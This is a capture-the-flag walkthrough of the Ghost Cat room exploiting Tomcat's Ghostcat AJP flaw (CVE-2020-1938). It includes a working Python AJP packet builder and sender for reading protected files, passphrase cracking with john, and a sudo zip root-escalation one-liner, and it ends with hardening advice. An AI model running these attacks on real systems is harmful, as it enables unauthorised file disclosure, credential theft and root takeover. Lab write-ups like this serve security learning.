{THM}Ghost Cat
CVE-2020-1938
Last updated
Identify recent vulnerabilities to try to exploit the system or read files that you should not have access to.
Scan the target with nmap (with version detection) to find open ports.
The scan shows ports 22, 8009 and 8080 open. Browsing the web server on 8080 turns up nothing interesting, but the service banner identifies it as Apache Tomcat 9.0.30, and port 8009 is Tomcat's AJP connector. Let's search for known vulnerabilities in that version.
Tomcat 9.0.30 is affected by Ghostcat (CVE-2020-1938), and there are two public exploits for it. On this machine I use exploit 48143, pointed at the AJP port:
python2 48143.py THM_machine -p <port>
The file read discloses a username and password. Let's log in over SSH with them.
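To show what exploit 48143 is actually doing on the wire, here is an added example (my own code, not the page's exploit or Tomcat's code) that builds the AJP13 FORWARD_REQUEST packet Ghostcat relies on and parses it back for checking. The vulnerable connector copies any "generic" request attribute (code 0x0A) into the request, and Tomcat's DefaultServlet trusts the javax.servlet.include.* attributes when deciding which file to serve, so a client talking directly to port 8009 can ask for WEB-INF/web.xml even though HTTP requests for it are refused. The hostname target.local and the request path /ghostcat are assumptions; the constants and field layout are from the AJP13 protocol.

```python
"""AJP13 forward-request builder showing how the Ghostcat attributes are smuggled in."""
import socket
import struct

AJP_MAGIC = b"\x12\x34"          # client-to-container packets start with 0x1234
AJP_FORWARD_REQUEST = 2          # JK_AJP13_FORWARD_REQUEST prefix code
AJP_METHOD_GET = 2
AJP_SC_REQ_ATTRIBUTE = 0x0A      # generic request attribute: name string + value string
AJP_TERMINATOR = 0xFF

# The three attributes the vulnerable DefaultServlet trusts when building the path it serves.
GHOSTCAT_ATTRIBUTES = (
    "javax.servlet.include.request_uri",
    "javax.servlet.include.path_info",
    "javax.servlet.include.servlet_path",
)


def ajp_string(value):
    """Encode an AJP string: 2-byte big-endian length, bytes, NUL. None encodes as 0xFFFF."""
    if value is None:
        return b"\xff\xff"
    data = value.encode("utf-8")
    return struct.pack(">H", len(data)) + data + b"\x00"


def build_forward_request(server_name, server_port, req_uri, headers, attributes):
    """Serialise a complete AJP13 FORWARD_REQUEST packet for a GET."""
    body = bytes([AJP_FORWARD_REQUEST, AJP_METHOD_GET])
    body += ajp_string("HTTP/1.1")
    body += ajp_string(req_uri)
    body += ajp_string("127.0.0.1")   # remote_addr as reported to the webapp
    body += ajp_string(None)          # remote_host (absent)
    body += ajp_string(server_name)
    body += struct.pack(">H", server_port)
    body += b"\x00"                   # is_ssl = false
    body += struct.pack(">H", len(headers))
    for name, value in headers:       # names sent as plain strings rather than 0xA0xx codes
        body += ajp_string(name) + ajp_string(value)
    for name, value in attributes:
        body += bytes([AJP_SC_REQ_ATTRIBUTE]) + ajp_string(name) + ajp_string(value)
    body += bytes([AJP_TERMINATOR])
    return AJP_MAGIC + struct.pack(">H", len(body)) + body


def ghostcat_read_request(server_name, target_file="WEB-INF/web.xml"):
    """Request that makes DefaultServlet serve target_file from inside the webapp.

    path_info and servlet_path decide what is read, so WEB-INF/web.xml is served
    even though a direct HTTP request for it would get a 404."""
    attributes = [(GHOSTCAT_ATTRIBUTES[0], "/"),
                  (GHOSTCAT_ATTRIBUTES[1], target_file),
                  (GHOSTCAT_ATTRIBUTES[2], "/")]
    # "target.local"/8080/"/ghostcat" are assumed values; only the attributes matter
    return build_forward_request(server_name, 8080, "/ghostcat", [("host", server_name)], attributes)


class _Reader:
    """Cursor over a packet so the builder's output can be parsed back and checked."""
    def __init__(self, data):
        self.data, self.pos = data, 0

    def byte(self):
        self.pos += 1
        return self.data[self.pos - 1]

    def u16(self):
        self.pos += 2
        return struct.unpack(">H", self.data[self.pos - 2:self.pos])[0]

    def string(self):
        length = self.u16()
        if length == 0xFFFF:
            return None
        value = self.data[self.pos:self.pos + length].decode("utf-8")
        self.pos += length + 1            # skip the NUL terminator
        return value


def parse_forward_request(packet):
    """Decode a FORWARD_REQUEST packet into a dict (headers/attributes as lists of pairs)."""
    r = _Reader(packet)
    if r.u16() != 0x1234:
        raise ValueError("not a client-to-container AJP packet")
    if r.u16() != len(packet) - 4:
        raise ValueError("length field does not match packet size")
    if r.byte() != AJP_FORWARD_REQUEST:
        raise ValueError("not a FORWARD_REQUEST")
    req = {"method": r.byte(), "protocol": r.string(), "req_uri": r.string(),
           "remote_addr": r.string(), "remote_host": r.string(),
           "server_name": r.string(), "server_port": r.u16(), "is_ssl": bool(r.byte())}
    req["headers"] = [(r.string(), r.string()) for _ in range(r.u16())]
    req["attributes"] = []
    while True:
        code = r.byte()
        if code == AJP_TERMINATOR:
            break
        if code != AJP_SC_REQ_ATTRIBUTE:
            raise ValueError("unsupported attribute code 0x%02x" % code)
        req["attributes"].append((r.string(), r.string()))
    return req


def send_request(host, port, packet, timeout=5.0):
    """Send a packet to an AJP connector and return the raw reply (network use only)."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(packet)
        try:
            while True:
                chunk = sock.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass      # Tomcat may keep the connection open for reuse after END_RESPONSE
    return b"".join(chunks)
```

Against a live connector you would call send_request(host, 8009, ghostcat_read_request(host)); Tomcat answers with container-to-client packets (magic "AB", prefixes 0x04 SEND_HEADERS and 0x03 SEND_BODY_CHUNK) whose body chunks carry the file contents, and decoding those is left out here. The parser exists so the encoding can be verified offline: it checks the magic bytes, the length field and the attribute terminator, which is also where you would look if a request silently fails.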
Step 2 - Gaining Access
ssh username@THM_machine
We're in. Let's see what files are in the home directory.
ls -la
There is an encrypted file, credential.pgp, and a PGP key in ASCII armour, tryhackme.asc.
Import the key with gpg --import tryhackme.asc, then try to decrypt the file with gpg --decrypt credential.pgp. Decryption asks for the key's passphrase, which we don't know.
So we brute-force it. Copy the key to our own machine and convert it into a hash john can crack:
scp skyfuck@THM_machine:tryhackme.asc /<ourlocation>
gpg2john <ourlocation> > <newname>
Then crack it with john:
john --format=gpg --wordlist=<pathlocation> <newname>
With the passphrase recovered, go back to the target, run gpg --decrypt credential.pgp again and enter it.
The decrypted file contains another set of credentials (username:password).
Switch to that user:
su <username>
Now we are Merlin. Let's find our flag.
The user flag is in Merlin's home directory.
Now on to privilege escalation. I start with my favourite command:
sudo -l
The output shows that zip may be run as root via sudo. As GTFOBins notes, if the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Jackpot!
Let's exploit it with the GTFOBins recipe for zip. -T tells zip to test the archive and -TT supplies the command used for that test, so zip runs sh as root; zip appends the archive name to the command, which the trailing # comments out.
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
We are now root.
Let's find the root flag.
The root flag is in root's home directory.
Users are strongly encouraged to upgrade to a fixed version of Tomcat to ensure they're protected against this vulnerability.
Other recommended mitigations:
If the AJP connector is not in use, comment it out in conf/server.xml.
If the AJP connector is in use and you cannot upgrade, set the requiredSecret attribute on the connector. This is akin to a password and must be strong and unique, and the reverse proxy in front of Tomcat must be configured to send the same secret.
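Here is an added server.xml fragment (my own example, not taken from the page or from a Tomcat distribution) showing the exposed connector beside the two mitigations above. The address and secret values are placeholders; the attribute is requiredSecret on the 9.0.30-era connector shown in this room, while Tomcat 9.0.31 and later renamed it to secret, added secretRequired (default true) and bind AJP to loopback by default.

```xml
<!-- Exposed: listens on all interfaces with no shared secret, which is what the
     exploit above talks to on port 8009. -->
<Connector protocol="AJP/1.3" port="8009" redirectPort="8443" />

<!-- Mitigation 1: AJP not needed, so leave the connector commented out. -->
<!--
<Connector protocol="AJP/1.3" port="8009" redirectPort="8443" />
-->

<!-- Mitigation 2: AJP needed on a version without the fix. Bind it to loopback so
     only a local reverse proxy can reach it, and require a strong, unique secret
     (placeholder value; generate your own). -->
<Connector protocol="AJP/1.3"
           address="127.0.0.1"
           port="8009"
           redirectPort="8443"
           requiredSecret="REPLACE-WITH-A-LONG-RANDOM-SECRET" />
```

After restarting Tomcat, check from another host that port 8009 is no longer reachable (an nmap scan like the one at the start of this room should now show it closed or filtered), and configure the same secret on the proxy side (workers.properties for mod_jk, or the secret= parameter of mod_proxy_ajp in httpd 2.4.42 and later); otherwise Tomcat rejects the proxy's requests as well.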
CVE-2020-1938 Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability
This CVE affects the Apache JServ Protocol (AJP) connector in Tomcat. AJP is a binary protocol designed to carry requests received by a front-end web server (such as Apache httpd) to the application server, with less overhead than proxying them as HTTP.
Where the vulnerable server also allows file uploads, an attacker could upload malicious JavaServer Pages (JSP) code inside a variety of file types, then use this vulnerability to include that file and gain remote code execution (RCE).